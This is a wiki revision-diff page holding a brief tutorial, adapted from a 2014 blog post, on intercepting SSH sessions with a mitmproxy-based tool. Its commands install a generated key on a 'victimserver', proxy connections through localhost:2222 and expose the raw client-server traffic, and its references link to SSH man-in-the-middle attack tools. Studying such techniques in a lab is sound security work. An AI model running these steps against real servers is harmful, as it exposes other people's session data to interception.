Difference between revisions of "MITM: mitmssh"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
(4 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
− | sumber: https:// | + | sumber: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/ |
+ | # Download mitmproxy | ||
+ | git clone https://github.com/mitmproxy/mitmproxy.git | ||
+ | #Generate mitm keys (these go to ~/.mitmkeys) | ||
+ | ./mitmkeys | ||
+ | Now you want to install the SSH key you just generated to the server you want to mitm. | ||
+ | #Install SSH key | ||
+ | ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver | ||
− | + | Then run the proxy, pointing it at the victimserver. | |
− | + | #Run proxy | |
+ | ./mitmproxy_ssh -H victimserver | ||
− | + | This runs the proxy on localhost:2222 | |
− | + | Now simply connect to the local proxy: | |
− | + | ssh localhost -p 2222 | |
− | |||
− | + | And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh. | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
==Referensi== | ==Referensi== | ||
+ | * https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/ | ||
* https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/ | * https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/ | ||
* https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py | * https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py | ||
* http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/ | * http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/ |
Latest revision as of 09:31, 3 October 2018
sumber: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/
# Download mitmproxy git clone https://github.com/mitmproxy/mitmproxy.git
#Generate mitm keys (these go to ~/.mitmkeys) ./mitmkeys
Now you want to install the SSH key you just generated to the server you want to mitm.
#Install SSH key ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
Then run the proxy, pointing it at the victimserver.
#Run proxy ./mitmproxy_ssh -H victimserver
This runs the proxy on localhost:2222
Now simply connect to the local proxy:
ssh localhost -p 2222
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.